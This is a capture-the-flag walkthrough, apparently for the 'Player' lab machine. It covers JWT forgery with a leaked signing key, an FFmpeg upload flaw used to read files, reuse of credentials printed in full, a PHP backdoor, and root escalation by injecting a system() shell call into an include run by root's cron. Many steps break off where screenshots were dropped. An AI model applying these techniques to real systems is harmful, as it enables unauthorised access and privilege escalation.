Things to note:

  1. Secret key used to sign the JWT token →_S0_R@nd0m_P@ss_.
  2. The access code to get the new file location.
  3. Masked endpoint →7F2xxxxxxxxxxxxx/

If we decode the JWT token captured in cookie while requesting /launcher/dee8dc8a47256c64630d803a4c40786e.php using , we get

Copy the cookie

paste here the cookie : access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ

and we get

We just need to change the access_code to the value found on backup file and sign the token using _S0_R@nd0m_P@ss_

When we upload any file , we see that

It gets uploaded successfully with a message of compression completed followed by a link to our uploads , clicking on the Buffed Media link.

We get the download prompt for it , also the file extension is .avi which is for video files , whereas we uploaded a jpg file , so even we upload a video file , it gets uploaded and when we search on google about video upload exploits , we get

Checking possible exploits for the same, we see that there exists a vulnerability in FFMpeg. Using the script from this repo, we will create custom payloads to read arbitrary files from the server.

When we run this file

We get forbidden command errors for every command we try , so as we know this port was running OpenSSH 7.2 , so I went on looking for any interesting CVEs for it and got

copy the content and save in

These credentials (peter : CQXpm\z)G5D#%S$y=) worked with dev.player.htb:

And we are in

Now try to create new project in /var/www/html:

But we are getting error to create new project here.

I wanted to see if that was related to /var/www/demo/home so I created a file called new.php that echoed new and I tried to access it through /home:

Now on portal we will create php backdoor

when I ran pspy to monitor the processes I noticed that /var/lib/playbuff/buff.php got executed as root periodically:

2020/01/18 05:25:02 CMD: UID=0    PID=3650   | /usr/bin/php /var/lib/playbuff/buff.php

I couldn’t write to it but it included another php file which I could write to (/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php):

Add this line this 
system("bash -c /tmp/");

in the code to get it executed

root@kali:~# mv rev.php dee8dc8a47256c64630d803a4c40786g.php